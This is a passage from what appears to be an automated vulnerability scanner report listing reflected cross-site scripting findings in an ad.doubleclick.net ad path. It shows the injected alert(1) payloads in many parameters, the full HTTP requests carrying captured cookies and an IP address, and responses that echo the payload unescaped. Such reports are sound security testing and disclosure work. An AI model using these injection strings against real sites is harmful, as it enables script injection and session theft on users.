GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comabc97"-alert(1)-"306082136f6&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7190

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comabc97"-alert(1)-"306082136f6&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q1000000140300000310128004BAN201");
var fscU
...[SNIP]...

3.181. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce2ce"-alert(1)-"9cfe988ae87 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAXce2ce"-alert(1)-"9cfe988ae87&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7205

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAXce2ce"-alert(1)-"9cfe988ae87&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q1000000140300000310128004BAN181");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque"
...[SNIP]...

3.182. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1cb6"-alert(1)-"d5ee076476 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=a1cb6"-alert(1)-"d5ee076476&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7186

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7-300/250%3B41900386/41918173/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=a1cb6"-alert(1)-"d5ee076476&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06
...[SNIP]...

3.183. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 703d6"-alert(1)-"b48e245097a was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100703d6"-alert(1)-"b48e245097a&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
1748593/41766380/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100703d6"-alert(1)-"b48e245097a&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/htt
...[SNIP]...

3.184. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e695"-alert(1)-"df34e3faf88 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=8e695"-alert(1)-"df34e3faf88&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7205

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=8e695"-alert(1)-"df34e3faf88&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q1000000140300000310128004
...[SNIP]...

3.185. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b99c1"-alert(1)-"37925af0b26 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328b99c1"-alert(1)-"37925af0b26&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7205

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
61926988%3B4307-300/250%3B41900699/41918486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328b99c1"-alert(1)-"37925af0b26&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.
...[SNIP]...

3.186. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e784"-alert(1)-"614b3ef8fb was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.2438e784"-alert(1)-"614b3ef8fb&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7302

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.2438e784"-alert(1)-"614b3ef8fb&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q1000000140300000310128004BAN074");
var fscUrl = url;
var fscUrlClickTagFound
...[SNIP]...

3.187. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ee2e"-alert(1)-"625b1fe02f was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F8204981ee2e"-alert(1)-"625b1fe02f&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7302

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F8204981ee2e"-alert(1)-"625b1fe02f&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/
...[SNIP]...

3.188. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4e31"-alert(1)-"b2055b50289 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421e4e31"-alert(1)-"b2055b50289&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7190

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/166/%2a/w%3B240097948%3B2-0%3B0%3B61926988%3B4307-300/250%3B41900386/41918173/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421e4e31"-alert(1)-"b2055b50289&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&co
...[SNIP]...

3.189. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bed07"-alert(1)-"256a1270d98 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3bed07"-alert(1)-"256a1270d98&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7205

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0%3B0%3B61926988%3B4307-300/250%3B41900699/41918486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3bed07"-alert(1)-"256a1270d98&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX
...[SNIP]...

3.190. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e42f7"-alert(1)-"fff3f79dcc6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

